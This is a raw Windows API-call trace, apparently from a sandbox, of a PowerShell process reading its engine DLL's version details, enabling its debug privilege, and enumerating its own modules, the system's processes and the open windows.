	[0496.768] lstrcpyW (in: lpString1=0x339860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0496.768] CoTaskMemFree (pv=0x339860) 
	[0496.768] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c37500, puLen=0x1edc20) returned 1
	[0496.768] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0496.768] CoTaskMemAlloc (cb=0x20) returned 0x3fd160
	[0496.768] lstrcpyW (in: lpString1=0x3fd160, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0496.769] CoTaskMemFree (pv=0x3fd160) 
	[0496.769] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c37540, puLen=0x1edc20) returned 1
	[0496.769] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0496.769] CoTaskMemAlloc (cb=0x44) returned 0x339860
	[0496.769] lstrcpyW (in: lpString1=0x339860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0496.769] CoTaskMemFree (pv=0x339860) 
	[0496.769] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c375a8, puLen=0x1edc20) returned 1
	[0496.769] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0496.769] CoTaskMemAlloc (cb=0x76) returned 0x39f9e0
	[0496.769] lstrcpyW (in: lpString1=0x39f9e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0496.769] CoTaskMemFree (pv=0x39f9e0) 
	[0496.769] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c37644, puLen=0x1edc20) returned 1
	[0496.769] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0496.770] CoTaskMemAlloc (cb=0x44) returned 0x339860
	[0496.770] lstrcpyW (in: lpString1=0x339860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0496.770] CoTaskMemFree (pv=0x339860) 
	[0496.770] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c376a8, puLen=0x1edc20) returned 1
	[0496.770] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0496.770] CoTaskMemAlloc (cb=0x58) returned 0x3c07d0
	[0496.770] lstrcpyW (in: lpString1=0x3c07d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0496.770] CoTaskMemFree (pv=0x3c07d0) 
	[0496.770] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c37724, puLen=0x1edc20) returned 1
	[0496.770] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0496.770] CoTaskMemAlloc (cb=0x20) returned 0x3fd160
	[0496.771] lstrcpyW (in: lpString1=0x3fd160, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0496.771] CoTaskMemFree (pv=0x3fd160) 
	[0496.771] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c373cc, puLen=0x1edc20) returned 1
	[0496.771] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0496.771] CoTaskMemAlloc (cb=0x66) returned 0x3f7890
	[0496.771] lstrcpyW (in: lpString1=0x3f7890, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0496.771] CoTaskMemFree (pv=0x3f7890) 
	[0496.771] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x0, puLen=0x1edc20) returned 0
	[0496.771] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x0, puLen=0x1edc20) returned 0
	[0496.771] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x0, puLen=0x1edc20) returned 0
	[0496.771] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edbf8, puLen=0x1edbf0 | out: lplpBuffer=0x1edbf8*=0x2c37374, puLen=0x1edbf0) returned 1
	[0496.772] CoTaskMemAlloc (cb=0x204) returned 0x3a23f0
	[0496.772] VerLanguageNameW (in: wLang=0x0, szLang=0x3a23f0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0496.774] CoTaskMemFree (pv=0x3a23f0) 
	[0496.774] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\", lplpBuffer=0x1edc48, puLen=0x1edc40 | out: lplpBuffer=0x1edc48*=0x2c37300, puLen=0x1edc40) returned 1
	[0496.780] GetCurrentProcessId () returned 0xd28
	[0497.545] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ecb70 | out: lpLuid=0x1ecb70*(LowPart=0x14, HighPart=0)) returned 1
	[0497.549] GetCurrentProcess () returned 0xffffffffffffffff
	[0497.550] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ecb90 | out: TokenHandle=0x1ecb90*=0x2e0) returned 1
	[0497.551] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2c3ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0497.552] CloseHandle (hObject=0x2e0) returned 1
	[0497.556] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd28) returned 0x2e0
	[0497.565] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2c3abb8, cb=0x200, lpcbNeeded=0x1edba8 | out: lphModule=0x2c3abb8, lpcbNeeded=0x1edba8) returned 1
	[0497.567] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2c3ae28, cb=0x18 | out: lpmodinfo=0x2c3ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0497.568] CoTaskMemAlloc (cb=0x804) returned 0x407130
	[0497.568] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x407130, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0497.569] CoTaskMemFree (pv=0x407130) 
	[0497.569] CoTaskMemAlloc (cb=0x804) returned 0x407130
	[0497.569] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x407130, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0497.570] CoTaskMemFree (pv=0x407130) 
	[0497.570] CloseHandle (hObject=0x2e0) returned 1
	[0497.578] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xd28) returned 0x2e0
	[0497.579] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x1edcd8 | out: lpExitCode=0x1edcd8*=0x103) returned 1
	[0498.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b088, Length=0x20000, ResultLength=0x1edca0 | out: SystemInformation=0x12c3b088, ResultLength=0x1edca0*=0x2edb8) returned 0xc0000004
	[0498.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b0b8, Length=0x315b8, ResultLength=0x1edca0 | out: SystemInformation=0x12c5b0b8, ResultLength=0x1edca0*=0x2edb8) returned 0x0
	[0498.323] EnumWindows (lpEnumFunc=0x29566ac, lParam=0x0) returned 1
	[0502.420] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0504.336] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x558
	[0505.307] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0505.586] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0505.587] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.292] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x538
	[0506.292] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.292] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x778
	[0506.292] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x778
	[0506.292] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.292] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x460
	[0506.293] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1664
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10b4
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10ac
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10ec
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1068
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x17e0
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x102c
	[0506.294] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x17a4
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1050
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1694
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1770
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1720
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x165c
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1578
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x16c0
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x161c
	[0506.295] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1638
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x15c8
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1554
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1674
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1520
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x14bc
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf8c
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe9c
	[0506.296] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1434
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x14ec
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfcc
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x12ac
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1484
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x934
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc0c
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb08
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x948
	[0506.297] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1178
	[0506.298] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x13e0
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xcd0
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x13fc
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xdc8
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc18
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc2c
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa1c
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1244
	[0506.299] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xdb0
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1398
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1358
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1370
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1340
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x130c
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x12c0
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x12e4
	[0506.300] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1270
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1298
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x120c
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x122c
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x11c4
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x11b0
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1188
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1148
	[0506.301] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1160
	[0506.303] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10fc
	[0506.303] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe34
	[0506.305] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xea4
	[0506.305] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x514
	[0506.305] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe48
	[0506.305] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xbc8
	[0506.305] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xdf8
	[0506.305] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x318
	[0506.306] GetWindow (hWnd=0x1044c, uCmd=0x4) returned 0x0
	[0506.307] IsWindowVisible (hWnd=0x1044c) returned 0
	[0506.307] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xcac
	[0506.307] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x8bc
	[0506.307] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf9c
	[0506.307] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf48
	[0506.307] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe40
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xecc
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xeb8
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe80
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe98
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe60
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xee4
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf00
	[0506.308] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xdf0
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe1c
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xdd0
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xd94
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xd74
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xd00
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xcd8
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc84
	[0506.309] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xca4
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc64
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc24
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb84
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xbac
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x384
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xab8
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x33c
	[0506.310] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa44
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa64
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x8a8
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xaf0
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x88c
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb04
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x910
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x230
	[0506.311] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xac0
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xab4
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xaac
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x3d0
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x978
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa7c
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x59c
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa88
	[0506.312] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa6c
	[0506.313] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa68
